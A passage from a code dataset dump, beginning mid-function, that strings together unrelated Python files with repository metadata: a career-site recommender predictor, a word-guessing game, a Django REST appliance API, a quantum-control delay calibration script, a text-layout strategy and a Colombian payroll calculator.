elif p.val > root.val and q.val > root.val:
return self.lowestCommonAncestor(root.right, p, q)
else:
return root
| [
"sarahgonsalves223@Sarahs-MacBook-Pro.local"
] | sarahgonsalves223@Sarahs-MacBook-Pro.local |
3a7db8d10da5e46182cefd5b90049a0fe9e5e7ea | 7466867c7d1fe8e3f51db27734513d9dcced8be9 | /predictor/predictor.py | b2394239115d608d16365cc2efce34edd6dbf35f | [] | no_license | china-liweihong/Recommendation_system-CareerVillage.org- | a1eaacfe5caba2c9bb8c0e430469ca540550a11b | d0301951fa35513f2cd449a5f81f882fa0a1fc0d | refs/heads/master | 2022-04-11T14:36:09.175234 | 2020-03-21T18:53:01 | 2020-03-21T18:53:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,279 | py | import pandas as pd
import numpy as np
import keras
import os
from sklearn.neighbors import KDTree
from preprocessors.queproc import QueProc
from preprocessors.proproc import ProProc
from utils.utils import TextProcessor
import pickle
import psutil
DUMP_PATH = 'dump'
tp = TextProcessor()
class Predictor:
"""
Class for handling closest professionals or questions queries
"""
def __init__(self, model: keras.Model, que_proc: QueProc, pro_proc: ProProc):
"""
:param model: compiled Keras model
:param que_data: processed questions's data
:param stu_data: processed student's data
:param pro_data: processed professional's data
:param que_proc: question's data processor
:param pro_proc: professional's data processor
:param que_to_stu: mappings from question's id to its author id
:param pos_pairs: list of positive question-student-professional-time pairs
"""
self.model = model
# construct mappings from entity id to features
with open(os.path.join(DUMP_PATH, 'predictor_dump.pkl'), 'rb') as file:
d = pickle.load(file)
self.stu_dict = d['stu_dict']
self.entity_to_paired = d['entity_to_paired']
self.pro_ids = d['pro_ids']
self.que_ids = d['que_ids']
self.que_tree = d['que_tree']
self.pro_tree = d['pro_tree']
# create two encoders
self.que_model = model.que_model
self.pro_model = model.pro_model
# initialize preprocessors
self.que_proc = que_proc
self.pro_proc = pro_proc
def __get_que_latent(self, que_df: pd.DataFrame, que_tags: pd.DataFrame) -> np.ndarray:
"""
Get latent vectors for questions in raw format
"""
que_df['questions_date_added'] = pd.to_datetime(que_df['questions_date_added'])
# extract and preprocess question's features
que_feat = self.que_proc.transform(que_df, que_tags).values[:, 2:]
# actual question's features are both question and student's features
stu_feat = np.vstack([self.stu_dict[stu] for stu in que_df['questions_author_id']])
que_feat = np.hstack([stu_feat, que_feat])
# encode question's data to get latent representation
lat_vecs = self.que_model.predict(que_feat)
return lat_vecs
def __get_pro_latent(self, pro_df: pd.DataFrame, que_df: pd.DataFrame, ans_df: pd.DataFrame,
pro_tags: pd.DataFrame) -> np.ndarray:
"""
Get latent vectors for professionals in raw format
"""
pro_df['professionals_date_joined'] = pd.to_datetime(pro_df['professionals_date_joined'])
que_df['questions_date_added'] = pd.to_datetime(que_df['questions_date_added'])
ans_df['answers_date_added'] = pd.to_datetime(ans_df['answers_date_added'])
# extract and preprocess professional's features
pro_feat = self.pro_proc.transform(pro_df, que_df, ans_df, pro_tags)
# select the last available version of professional's features
pro_feat = pro_feat.groupby('professionals_id').last().values[:, 1:]
# encode professional's data to get latent representation
lat_vecs = self.pro_model.predict(pro_feat)
return lat_vecs
def __construct_df(self, ids, sims, scores):
scores = np.round(scores, 4)
tuples = []
for i, cur_id in enumerate(ids):
for j, sim in enumerate(sims[i]):
if sim[0] not in self.entity_to_paired.get(cur_id, {}):
tuples.append((cur_id, sim[0], scores[i, j]))
score_df = pd.DataFrame(tuples, columns=['id', 'match_id', 'match_score'])
return score_df
def __get_ques_by_latent(self, ids: np.ndarray, lat_vecs: np.ndarray, top: int) -> pd.DataFrame:
"""
Get top questions with most similar latent representations to given vectors
"""
dists, ques = self.que_tree.query(lat_vecs, k=top)
ques = self.que_ids[ques]
scores = np.exp(-dists)
return self.__construct_df(ids, ques, scores)
def __get_pros_by_latent(self, ids: np.ndarray, lat_vecs: np.ndarray, top: int) -> pd.DataFrame:
"""
Get top professionals with most similar latent representations to given vectors
"""
dists, pros = self.pro_tree.query(lat_vecs, k=top)
pros = self.pro_ids[pros]
scores = np.exp(-dists)
return self.__construct_df(ids, pros, scores)
def find_pros_by_que(self, que_df: pd.DataFrame, que_tags: pd.DataFrame, top: int = 10) -> pd.DataFrame:
"""
Get top professionals with most similar internal representation to given questions
:param que_df: question's data in raw format
:param que_tags: questions's tags in raw format
:param top: number of professionals for each question to return
:return: dataframe of question's ids, matched professional's ids and similarity scores
"""
lat_vecs = self.__get_que_latent(que_df, que_tags)
return self.__get_pros_by_latent(que_df['questions_id'].values, lat_vecs, top)
def find_ques_by_que(self, que_df: pd.DataFrame, que_tags: pd.DataFrame, top: int = 5) -> pd.DataFrame:
"""
Get top questions with most similar internal representation to given questions
:param que_df: question's data in raw format
:param que_tags: questions's tags in raw format
:param top: number of questions for each question to return
:return: dataframe of question's ids, matched question's ids and similarity scores
"""
lat_vecs = self.__get_que_latent(que_df, que_tags)
print('in : ',psutil.Process(os.getpid()).memory_info().rss)
return self.__get_ques_by_latent(que_df['questions_id'].values, lat_vecs, top)
def find_ques_by_pro(self, pro_df: pd.DataFrame, que_df: pd.DataFrame, ans_df: pd.DataFrame,
pro_tags: pd.DataFrame, top: int = 10) -> pd.DataFrame:
"""
Get top questions with most similar internal representation to given professional
:param pro_df: professional's data in raw format
:param que_df: question's data in raw format
:param ans_df: answer's data in raw format
:param pro_tags: professional's tags data in raw format
:param top: number of questions for each professional to return
:return: dataframe of professional's ids, matched question's ids and similarity scores
"""
lat_vecs = self.__get_pro_latent(pro_df, que_df, ans_df, pro_tags)
print('in : ',psutil.Process(os.getpid()).memory_info().rss)
return self.__get_ques_by_latent(pro_df['professionals_id'].values, lat_vecs, top)
def find_pros_by_pro(self, pro_df: pd.DataFrame, que_df: pd.DataFrame, ans_df: pd.DataFrame,
pro_tags: pd.DataFrame, top: int = 10) -> pd.DataFrame:
"""
Get top professionals with most similar internal representation to given professional
:param pro_df: professional's data in raw format
:param que_df: question's data in raw format
:param ans_df: answer's data in raw format
:param pro_tags: professional's tags data in raw format
:param top: number of questions for each professional to return
:return: dataframe of professional's ids, matched professional's ids and similarity scores
"""
lat_vecs = self.__get_pro_latent(pro_df, que_df, ans_df, pro_tags)
return self.__get_pros_by_latent(pro_df['professionals_id'].values, lat_vecs, top)
class Formatter:
"""
Class with useful for Predictor input/output functionality
"""
def __init__(self, data_path: str):
pro = pd.read_csv(os.path.join(data_path, 'professionals.csv'))
que = pd.read_csv(os.path.join(data_path, 'questions.csv'))
tags = pd.read_csv(os.path.join(data_path, 'tags.csv'))
tag_users = pd.read_csv(os.path.join(data_path, 'tag_users.csv'))
tag_que = pd.read_csv(os.path.join(data_path, 'tag_questions.csv'))
tag_merged = tags.merge(tag_users, left_on='tags_tag_id', right_on='tag_users_tag_id')
tags_grouped = tag_merged.groupby('tag_users_user_id').agg(lambda x: ' '.join(x))[['tags_tag_name']]
self.pro = pro.merge(tags_grouped, left_on='professionals_id', right_index=True, how='left')
tag_merged = tags.merge(tag_que, left_on='tags_tag_id', right_on='tag_questions_tag_id')
tags_grouped = tag_merged.groupby('tag_questions_question_id').agg(lambda x: ' '.join(x))[['tags_tag_name']]
self.que = que.merge(tags_grouped, left_on='questions_id', right_index=True, how='left')
def get_que(self, scores: pd.DataFrame) -> pd.DataFrame:
"""
Append all the question's data to question's scoring dataframe from Predictor
:param scores: result of similar questions query on Predictor object
:return: extended dataframe
"""
return self.que.merge(scores, left_on='questions_id', right_on='match_id').sort_values('match_score',
ascending=False)
def get_pro(self, scores: pd.DataFrame) -> pd.DataFrame:
"""
Append all the professional's data to professional's scoring dataframe from Predictor
:param scores: result of similar professionals query on Predictor object
:return: extended dataframe
"""
return self.pro.merge(scores, left_on='professionals_id', right_on='match_id').sort_values('match_score',
ascending=False)
@staticmethod
def __convert_tuples(ids, tags):
tuples = []
for i, tgs in enumerate(tags):
que = ids[i]
for tag in tgs.split(' '):
tuples.append((que, tag))
return tuples
@staticmethod
def convert_que_dict(que_dict: dict) -> (pd.DataFrame, pd.DataFrame):
"""
Converts dictionary of question data into desired form
:param que_dict: dictionary of question data
"""
# get DataFrame from dict
que_df = pd.DataFrame.from_dict(que_dict)
# create question-tag tuples
tuples = Formatter.__convert_tuples(que_df['questions_id'].values, que_df['questions_tags'].values)
# create DataFrame from tuples
que_tags = pd.DataFrame(tuples, columns=['tag_questions_question_id', 'tags_tag_name'])
que_df.drop(columns='questions_tags', inplace=True)
que_tags['tags_tag_name'] = que_tags['tags_tag_name'].apply(lambda x: tp.process(x, allow_stopwords=True))
que_df['questions_title'] = que_df['questions_title'].apply(tp.process)
que_df['questions_body'] = que_df['questions_body'].apply(tp.process)
que_df['questions_whole'] = que_df['questions_title'] + ' ' + que_df['questions_body']
return que_df, que_tags
@staticmethod
def convert_pro_dict(pro_dict: dict) -> (pd.DataFrame, pd.DataFrame):
"""
Converts dictionary of professional data into desired form
:param pro_dict: dictionary of professional data
"""
# get DataFrame from dict
pro_df = pd.DataFrame.from_dict(pro_dict)
pros = pro_df['professionals_id'].values
# create professional-tag tuples
tuples = Formatter.__convert_tuples(pro_df['professionals_id'].values,
pro_df['professionals_subscribed_tags'].values)
# create DataFrame from tuples
pro_tags = pd.DataFrame(tuples, columns=['tag_users_user_id', 'tags_tag_name'])
pro_df.drop(columns='professionals_subscribed_tags', inplace=True)
pro_tags['tags_tag_name'] = pro_tags['tags_tag_name'].apply(lambda x: tp.process(x, allow_stopwords=True))
pro_df['professionals_headline'] = pro_df['professionals_headline'].apply(tp.process)
pro_df['professionals_industry'] = pro_df['professionals_industry'].apply(tp.process)
return pro_df, pro_tags | [
"fy_zadi@esi.dz"
] | fy_zadi@esi.dz |
9915b01a6a3ab3093a9f6fb7167c27b84ddebc0b | 938e618517113016d10aa401a987a58f445bdf84 | /game.py | 17dab103dd140660efeb1473e579440aa621414a | [] | no_license | divyeshbalar/PythonWordGame | 8081a2aea998403129efd7a8d85579ee4ca52fa1 | c3f7214b770460b15b444b0acc36c294841c19cd | refs/heads/master | 2020-05-24T18:03:39.971339 | 2019-06-07T19:07:40 | 2019-06-07T19:07:40 | 187,401,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,465 | py | import math
import random
import PythonWordGame.stringDb as stringDb
class game:
"""
@author: Divyeshkumar Balar(40062267)
Class game is main blueprint of game data structure;
which includes a static list with the frequency of each character.
It also include helper methods
"""
wordFrequency = {
'E': 12.02,
'T': 9.10,
'A': 8.12,
'O': 7.68,
'I': 7.31,
'N': 6.95,
'S': 6.28,
'R': 6.02,
'H': 5.92,
'D': 4.32,
'L': 3.98,
'U': 2.88,
'C': 2.71,
'M': 2.61,
'F': 2.30,
'Y': 2.11,
'W': 2.09,
'G': 2.03,
'P': 1.82,
'B': 1.49,
'V': 1.11,
'K': 0.69,
'X': 0.17,
'Q': 0.11,
'J': 0.10,
'Z': 0.07
}
def __init__(self):
s1 = stringDb.stringDb()
self.word = s1.getRandomWord()
self.status = 0 #0 for giveup and 1 for success
self.noOfBadGuess = 0
self.currentGuess = '----'
self.score = 0
self.baseScore = self.getBaseScoreOfWord()
def getScore(self):
"""
It returns the current score
"""
return self.score
def getHintChar(self):
"""
This method returns the random hint character out of 4 leter word
and deduct the relevent score from total;
deduction of score is done by other method.
"""
randVar = random.choice(range(0,4,1))
tempChar = self.word[randVar]
while self.isCurrentGuessContains(tempChar):
randVar = random.choice(range(4))
tempChar= self.word[randVar]
k = 0
tempStr= ''
for i in self.currentGuess:
if(k == randVar or self.word[k] == self.word[randVar]):
tempStr+=tempChar
else:
tempStr+=i
k+=1
self.currentGuess = tempStr
if(self.currentGuess == self.word):
print("Guess a 4 letter word: ", self.currentGuess)
self.scoreDownForChar(tempChar)
return tempChar
def isCorrectWord(self, tempWord):
"""
This method will return true/false depending on given word
from user matches to the current word.
It also call methods to increase or deduct the score accordingly.
"""
if(tempWord == self.word):
self.getBaseScoreOfWord()
self.score+=10
print("Its not Possible, you are cheating.......... or you are superHuman")
self.status = 1
self.currentGuess = tempWord
return True
else:
print("Try again, better luck next time")
self.deduceScoreForWrongWord()
return False
def isCurrentGameOver(self):
"""
Return true is the current game is over
"""
if self.word == self.currentGuess:
return True
else:
return False
def isCurrentGuessContains(self, tempChar):
"""
This method return True if the passed character is \r
already in currntly guessed string.
Otherwise returns false
"""
for i in self.currentGuess:
if(i == tempChar):
return True
return False
def isCorrectGuess(self, tempChar):
"""
This method returns true
if the character entered by user is correct guess
(means, part of current word)
It also add or deduct the score accordingly
"""
k = 0
flag = False
tempStr = ''
if(self.isCurrentGuessContains(tempChar)):
print("This letter is already guess by you Dumb!!")
self.noOfBadGuess+=1
return False
for i in self.word:
if(i == tempChar):
tempStr += tempChar
self.scoreUpForChar(tempChar)
flag = True
k+=1
else:
tempStr+=self.currentGuess[k]
k+=1
self.currentGuess = tempStr
if(flag == False):
self.noOfBadGuess+=1
self.scoreDownForChar(tempChar)
if(self.currentGuess == self.word):
self.status = 1
return flag
def deduceScoreForWrongWord(self):
"""
This method deduct score when the word entered by
user(Guess by user) is wrong
deducing score for each wrong 'word'(Not Character) guess
if the current current score is zero and
user enter the wrong word
this method will reduce score by base score
if score is not zero than it will reduce 10% of
total basescore from score
"""
if(self.score == 0):
self.score -= self.baseScore
else:
self.score-=self.baseScore*0.10
def getBaseScoreOfWord(self):
"""
This method calculate the base score for
each rnadom word picked from the data set
base score is calculated for word
base score method returns the base score for current word
sum of max (frequency - frquency of each charater)
Hence, 'eeee' got the least score and 'zzzz'
got the highest base score
"""
temp = 0
for i in self.word:
temp+=(float(self.getWordFrequency('E'))-float(self.getWordFrequency(i)))
return float(temp)
def getWordFrequency(self, tempChars):
"""
This method return the probability of given character.
"""
tempChars = tempChars.upper()
return game.wordFrequency.get(tempChars)
def getWordOnDemand(self):
"""
This method returns the whole word,
in case when user giveup and press 'X'
It deduct the score as much as the baseScore of the word
"""
self.currentGuess = self.word
self.score-=self.getBaseScoreOfWord()
self.noOfBadGuess+=1
self.status = 0
return self.currentGuess
#---------------------------------------------Scoring up and down ---------------------------
def scoreDownForChar(self, tempChar):
"""
This method include the logic to decrease the score
when the guessed character is wrong
total score minus (probability of tempchar - max frequency )
for the most frquent character there will be least deduction and
for the least frequent character there is high deduction
"""
tempChar = tempChar.upper()
probOfChar = float(self.getWordFrequency(tempChar))
self.score -= (probOfChar - float(self.getWordFrequency('E')))
def scoreUpForChar(self, tempChar):
"""
total score plus max probability - probability of character
scoring up depends on the frequency of character
the most frequent character will have
least effect on the total score
and the least frequent character will add more value to total
"""
tempChar = tempChar.upper()
probOfChar = float(self.getWordFrequency(tempChar))
self.score = self.score + (float(self.getWordFrequency('E')- probOfChar))
| [
"divyeshkumar_balar@outlook.com"
] | divyeshkumar_balar@outlook.com |
acb5246b57c491991154128c84af2f4c07e2a5d5 | 758c7be672c044613b6ef4d661288150e3e2c960 | /Appliance_app/views.py | 59f3c74e773b09620cbac61faaaf6bfca87f2c39 | [] | no_license | ttovely/Appliance | e637007843045ab6304970ea26e7b7fc2607a564 | dd7a3b8a9b18e7e68129d7b062bc17ccc93244fe | refs/heads/master | 2023-08-02T09:57:53.301698 | 2021-09-29T08:59:18 | 2021-09-29T08:59:18 | 411,601,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | from .models import Category, Appliances
from .serializers import CategorySerializer, AppliancesSerializer, CommentSerializer
from rest_framework.viewsets import ModelViewSet
from rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework import serializers, status
from rest_framework.filters import SearchFilter
class CategoryVievSet(ModelViewSet):
queryset = Category.objects.all()
serializer_class = CategorySerializer
permission_classes = [IsAuthenticated, ]
filter_backends = [SearchFilter, ]
search_fields = ['category', ]
@action(methods=['post', ], detail=True, serializer_class = AppliancesSerializer)
def add_appliance(self, request, *args, **kwargs):
category = self.get_object()
serializer = AppliancesSerializer(data=request.data)
if serializer.is_valid():
data = serializer.validated_data
appliance = Appliances.objects.create(
brand=data['brand'],
category=category,
model=data['model'],
price=data['price'],
quantity=data['quantity'],
inStock=data['inStock']
)
appliance.save()
serializer = AppliancesSerializer(instance=appliance)
return Response(serializer.data, status=status.HTTP_200_OK)
else:
return Response(serializer.errors, status= status.HTTP_400_BAD_REQUEST)
class AppliancesViewSet(ModelViewSet):
queryset = Appliances.objects.all()
serializer_class = AppliancesSerializer
permission_classes = [IsAuthenticatedOrReadOnly, ]
filter_backends = [SearchFilter, ]
search_fields = ['brand', 'category__category', 'model']
@action(methods=['post',], detail=True, serializer_class = CommentSerializer)
def add_comment(self, request, *args, **kwargs):
appliances = self.get_object()
serializer = CommentSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
serializer.save(author = request.user, appliances = appliances)
return Response(serializer.data)
@action(methods=['get', 'post', ], detail=True)
def minus_quantity(self, request, *args, **kwargs):
appliances = self.get_object()
if appliances.quantity > 0:
appliances.quantity -=1
if appliances.quantity ==0:
appliances.inStock = False
appliances.save()
serializer = self.get_serializer_class()(instance=appliances)
return Response(serializer.data)
else:
appliances.save()
appliances = self.get_serializer_class()(instance=appliances)
return Response(appliances.data)
else:
return Response({'Error': 'quantity is zero'})
@action(methods=['get', ], detail=True)
def add_quantity(self, request, *args, **kwargs):
appliances = self.get_object()
appliances.quantity +=1
appliances.inStock = True
appliances.save()
serializer = self.get_serializer_class()(instance=appliances)
return Response(serializer.data)
| [
"bagievavttovely@gmail.com"
] | bagievavttovely@gmail.com |
f047ba14d4aa661c9fc681be9b3cea0e8dbdbc32 | 263c79fd1d8541f0cf0b5dd9ed1c5e8acd463556 | /Quantum-Control-Applications/Optically addressable spin qubits/Cryogenic nanophotonic cavity/calibrate_delays.py | 72d431fb6ccdd22f4a7fc2968c16a840c0982136 | [
"BSD-3-Clause"
] | permissive | qua-platform/qua-libs | d929681da67fa4e88e96d0f96eef19034146a039 | 245bdeb625e2e64005962a02dcb58d3441e6afc6 | refs/heads/main | 2023-09-01T06:04:57.665500 | 2023-08-29T15:01:47 | 2023-08-29T15:01:47 | 293,225,951 | 45 | 13 | BSD-3-Clause | 2023-09-05T08:09:32 | 2020-09-06T07:29:42 | Python | UTF-8 | Python | false | false | 3,459 | py | """
calibrate_delays.py: Plays a MW pulse during a laser pulse, while performing time tagging throughout the sequence.
This allows measuring all the delays in the system, as well as the NV initialization duration.
If the counts are too high, the program might hang. In this case reduce the resolution or use
calibrate_delays_python_histogram.py if high resolution is needed.
"""
from qm.QuantumMachinesManager import QuantumMachinesManager
from qm.qua import *
from qm import SimulationConfig
import matplotlib.pyplot as plt
from configuration import *
###################
# The QUA program #
###################
initial_delay_cycles = 500 // 4 # delay before laser (units of clock cycles = 4 ns)
laser_len_cycles = 2000 // 4 # laser duration length (units of clock cycles = 4 ns)
mw_len_cycles = 1000 // 4 # MW duration length (units of clock cycles = 4 ns)
wait_between_runs = 3000 // 4 # (4ns)
n_avg = 1e6
resolution = 12 # ns
meas_len = laser_len_cycles * 4 + 1000 # total measurement length (ns)
t_vec = np.arange(0, meas_len, 1)
with program() as calib_delays:
times = declare(int, size=100) # 'size' defines the max number of photons to be counted
times_st = declare_stream() # stream for 'times'
counts = declare(int) # variable to save the total number of photons
i = declare(int) # variable used to save data
n = declare(int) # variable used in for loop for averaging
n_st = declare_stream() # stream for 'iteration'
with for_(n, 0, n < n_avg, n + 1):
wait(initial_delay_cycles, "AOM") # wait before starting PL
play("laser_ON", "AOM", duration=laser_len_cycles)
wait(initial_delay_cycles + (laser_len_cycles - mw_len_cycles) // 2, "Yb") # delay the microwave pulse
play("cw", "Yb", duration=mw_len_cycles) # play microwave pulse
measure("readout", "SNSPD", None, time_tagging.analog(times, meas_len, counts))
wait(wait_between_runs, "SNSPD")
with for_(i, 0, i < counts, i + 1):
save(times[i], times_st) # save time tags to stream
save(n, n_st) # save number of iteration inside for_loop
with stream_processing():
times_st.histogram([[i, i + (resolution - 1)] for i in range(0, meas_len, resolution)]).save("times_hist")
n_st.save("iteration")
#####################################
# Open Communication with the QOP #
#####################################
qmm = QuantumMachinesManager(qop_ip)
simulate = True
if simulate:
simulation_config = SimulationConfig(duration=28000)
job = qmm.simulate(config, calib_delays, simulation_config)
job.get_simulated_samples().con1.plot()
else:
qm = qmm.open_qm(config)
job = qm.execute(calib_delays)
# Get results from QUA program
results = fetching_tool(job, data_list=["times_hist", "iteration"], mode="live")
# Live plotting
fig = plt.figure()
interrupt_on_close(fig, job) # Interrupts the job when closing the figure
while results.is_processing():
# Fetch results
times_hist, iteration = results.fetch_all()
# Progress bar
progress_counter(iteration, n_avg, start_time=results.get_start_time())
# Plot data
plt.cla()
plt.plot(t_vec[::resolution] + resolution / 2, times_hist / 1000 / (resolution / u.s) / iteration)
plt.xlabel("t [ns]")
plt.ylabel(f"counts [kcps / {resolution}ns]")
plt.title("Delays")
plt.pause(0.1)
| [
"noreply@github.com"
] | qua-platform.noreply@github.com |
c6e82994fe46b9592e04334480b1f29f27c8139e | 6aa6fbb3f3d971d3a0217b94c9a8e26a417f6758 | /core/layout/strategy/HorizontalStrategy.py | acbeafc94a31908cd085e6d1154f9aa0192464d4 | [
"MIT"
] | permissive | BboyHanat/TextGenerator | 25a52e484331d84328ea3620b0973d0ba9c4eb5d | 7e4ec737fbf4f6031d0c28a2c0f6cff662792a76 | refs/heads/master | 2022-03-27T11:58:15.940730 | 2022-03-01T06:32:09 | 2022-03-01T06:32:09 | 209,213,635 | 187 | 53 | null | 2020-05-13T06:56:29 | 2019-09-18T03:58:09 | Python | UTF-8 | Python | false | false | 661 | py | from core.layout.strategy import Strategy
class HorizontalStrategy(Strategy):
"""
只生成一个水平排布的文本贴图布局
"""
def logic(self, block_group, next_block) -> bool:
init_x = block_group.group_box[0]
init_y = block_group.group_box[1]
next_x = init_x
next_y = init_y
for block in block_group.block_list:
r = block.outer_box[2]
if r > next_x:
next_x = r
next_x += 1
next_block.locate_by_outter(next_x, next_y)
if self.check_is_out(block_group=block_group, block=next_block):
return False
return True
| [
"lijianan@tezign.com"
] | lijianan@tezign.com |
a3a700cace9dcfd1645f568a0f67b220c0a09d47 | 02c6202622850be6ca2a4d088cd8b6005d3bc8a1 | /nomina_helper_processor.py | 0c5f16b7d586291ff50912301ebaa71a5bc6f6de | [] | no_license | danielcelin/nomina_helper | 65fd0423fdff5f2591713b7895fc1b19fa56d768 | 5eaa5fb2bfe902a77876467f05188c5d8d6fc05c | refs/heads/master | 2021-01-22T10:15:04.069029 | 2015-11-12T15:56:14 | 2015-11-12T15:56:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,639 | py | """
NominaHelper v3.0
Programa para calcular la nomina de una empresa. Lee los nombres y salarios desde un archivo de texto
que se suministra como argumento de linea de comandos, por ejemplo, nombres.txt. Al final guarda la liquidacion
en el archivo liquidacion.txt, el registro de errores en errores.txt y el registro de operacion en log.txt.
A partir de la version 3, Nomina Helper es el nuevo nombre, cambia de EasyNomina. Tambien a partir de esta version
el programa cuenta con interfaz grafica de usuario (GUI) desarrollada en PyQt4.
Desarrollado por Juan Sebastian Lopez Villa
Octubre 15 de 2015
Valores de porcentajes para liquidacion de nomina tomados de http://www.gerencie.com/liquidacion-de-la-nomina.html.
"""
# Importar libreria sys para manejo de argumentos de linea de comandos
import sys
# Importar las clases del modelo de NominaHelper.
from modelo.nomina import *
from utils.log_utils import *
class NominaHelperProcessor:
def __init__(self, configuracion_nomina):
self.configuracion_nomina = configuracion_nomina
self.log_utils = LogUtils(self.configuracion_nomina.nombre_archivo_errores,
self.configuracion_nomina.nombre_archivo_registro)
def validar_linea(self, linea_por_validar, numero_linea):
array_respuesta = [0 for x in range(3)]
# Separar la linea por el simbolo (token) *
arreglo_campos = linea_por_validar.split("*")
# Validar la estructura de cada linea.
# Validacion 4 (Va4)
if len(arreglo_campos) != 2:
self.log_utils.guardar_error("La linea " + str(numero_linea) + " no cumple con la estructura requerida! Revisarla!")
array_respuesta[0] = False
return array_respuesta
nombre_por_validar = arreglo_campos[0]
arreglo_nombre = nombre_por_validar.split(" ")
# Validar el numero de palabras del nombre
# Validacion 5 (Va5)
if len(arreglo_nombre) < 2 or len(arreglo_nombre) > 5:
self.log_utils.guardar_error(
"El nombre " + arreglo_campos[0] + " no cumple con la longitud requerida! Revisar linea numero " + str(
numero_linea) + " de archivo de nomina.")
array_respuesta[0] = False
return array_respuesta
array_respuesta[1] = arreglo_nombre
# Validar que el salario sea de tipo numerico
# Validacion 6 (Va6)
try:
salario_base = int(arreglo_campos[1])
array_respuesta[2] = salario_base
except ValueError:
self.log_utils.guardar_error("El valor de salario " + arreglo_campos[
1] + " no puede convertirse a entero! Revisar linea numero " + str(
numero_linea) + " de archivo de nomina.")
array_respuesta[0] = False
return array_respuesta
array_respuesta[0] = True
return array_respuesta
# Funcion que finaliza el programa y guarda el respectivo mensaje de terminacion en el archivo errores.txt
def terminar_programa(self, mensaje_terminacion):
self.log_utils.guardar_error(mensaje_terminacion)
self.log_utils.guardar_log("Programa terminado por error... Verificar archivo errores.txt para mas detalles.")
# Terminar el programa
sys.exit()
def validar_archivo_nomina(self, nombre_archivo_nomina):
if not nombre_archivo_nomina.endswith(".txt"):
self.terminar_programa("El archivo de nomina no tiene extension .txt!")
self.log_utils.guardar_log("Extension de archivo de nomina OK")
# Variable que almacena las lineas del archivo, su contenido como tal.
lineas_archivo_nomina = tuple(self.log_utils.leer_lineas_archivo(nombre_archivo_nomina))
# Variable que almacena el numero de lineas del archivo
numero_lineas_nomina = len(lineas_archivo_nomina)
self.log_utils.guardar_log("Archivo de nomina leido OK")
# Validar que el archivo tenga el minimo numero de lineas.
# Validacion 3 (Va3)
if numero_lineas_nomina < self.configuracion_nomina.numero_minimo_lineas:
self.terminar_programa("El archivo de nomina debe contener como minimo " +
str(self.configuracion_nomina.numero_minimo_lineas) + " lineas!")
def calcular_auxilio_transporte(self, salario_base):
if salario_base <= self.configuracion_nomina.tope_auxilio_transporte:
self.log_utils.guardar_log("Empleado con derecho a auxilio de transporte ...")
return self.configuracion_nomina.auxilio_transporte
else:
return 0
def calcular_fondo_solidaridad(self, salario_base):
if salario_base >= self.configuracion_nomina.tope_fondo_solidaridad:
self.log_utils.guardar_log("Empleado paga fondo solidaridad pensional ...")
return self.configuracion_nomina.porcentaje_fondo_solidaridad * salario_base
else:
return 0
def calcular_seguridad_social(self, salario_base):
# ----- Seguridad Social ----- #
# Porcentaje aporte de salud realizado por la empresa 8.5%
self.log_utils.guardar_log("Calculando aporte salud empresa ...")
aporte_salud_empresa = 0.085 * salario_base
# Porcentaje aporte de salud realizado por la empresa 12%
self.log_utils.guardar_log("Calculando aporte pension empresa ...")
aporte_pension_empresa = 0.12 * salario_base
# Porcentaje aporte de riesgos laborales realizado por la empresa.
self.log_utils.guardar_log("Calculando aporte ARL con porcentaje " +
("%.3f" % self.configuracion_nomina.porcentaje_arl) + " ...")
aporte_arl_empresa = self.configuracion_nomina.porcentaje_arl * salario_base
return SeguridadSocial(aporte_salud_empresa, aporte_pension_empresa, aporte_arl_empresa)
def calcular_aportes_parafiscales(self, salario_base):
# ----- Aportes Parafiscales ----- #
# Porcentaje aporte parafiscal para SENA realizado por la empresa 2%
self.log_utils.guardar_log("Calculando aporte parafiscales sena ...")
aporte_parafiscales_sena = 0.02 * salario_base
# Porcentaje aporte parafiscal para ICBF realizado por la empresa 3%
self.log_utils.guardar_log("Calculando aporte parafiscales ICBF ...")
aporte_parafiscales_icbf = 0.03 * salario_base
# Porcentaje aporte parafiscal para Cajas de Compensacion realizado por la empresa 4%
self.log_utils.guardar_log("Calculando aporte parafiscales cajas de compensacion ...")
aporte_parafiscales_cajas = 0.04 * salario_base
return AporteParafiscal(aporte_parafiscales_sena, aporte_parafiscales_icbf, aporte_parafiscales_cajas)
def calcular_prestaciones_sociales(self, salario_base, auxilio_transporte_efectivo):
# ----- Prestaciones Sociales ----- #
# Porcentaje aporte cesantias realizado por la empresa 8.33%. Se debe tener en cuenta el auxilio de transporte.
self.log_utils.guardar_log("Calculando aporte cesantias ...")
aporte_cesantias = 0.0833 * (salario_base + auxilio_transporte_efectivo)
# Porcentaje aporte intereses sobre cesantias realizado por la empresa 1%
self.log_utils.guardar_log("Calculando aporte intereses sobre cesantias ...")
aporte_intereses_cesantias = 0.01 * aporte_cesantias
# Porcentaje aporte prima de servicios realizado por la empresa 8.33%.
# Se debe tener en cuenta el auxilio de transporte.
self.log_utils.guardar_log("Calculando aporte prima de servicios ...")
aporte_prima = 0.0833 * (salario_base + auxilio_transporte_efectivo)
# Porcentaje aporte vacaciones realizado por la empresa 4.17%
self.log_utils.guardar_log("Calculando aporte vacaciones ...")
aporte_vacaciones = 0.0833 * salario_base
return PrestacionSocial(aporte_cesantias, aporte_intereses_cesantias, aporte_prima, aporte_vacaciones)
def calcular_apropiaciones(self, salario_base, auxilio_transporte_efectivo):
seguridad_social = self.calcular_seguridad_social(salario_base)
aportes_parafiscales = self.calcular_aportes_parafiscales(salario_base)
prestaciones_sociales = self.calcular_prestaciones_sociales(salario_base, auxilio_transporte_efectivo)
return Apropiacion(seguridad_social, aportes_parafiscales, prestaciones_sociales)
def calcular_deducciones(self, salario_base):
# Porcentaje aporte de salud realizado por el empleado 4%
self.log_utils.guardar_log("Calculando aporte salud empleado ...")
aporte_salud_empleado = 0.04 * salario_base
self.log_utils.guardar_log("Calculando aporte fondo de solidaridad pensional ...")
aporte_fondo_solidaridad = self.calcular_fondo_solidaridad(salario_base)
# Porcentaje aporte de salud realizado por el empleado 4%
self.log_utils.guardar_log("Calculando aporte pension empleado ...")
aporte_pension_empleado = 0.04 * salario_base
return Deduccion(aporte_salud_empleado, aporte_pension_empleado, aporte_fondo_solidaridad)
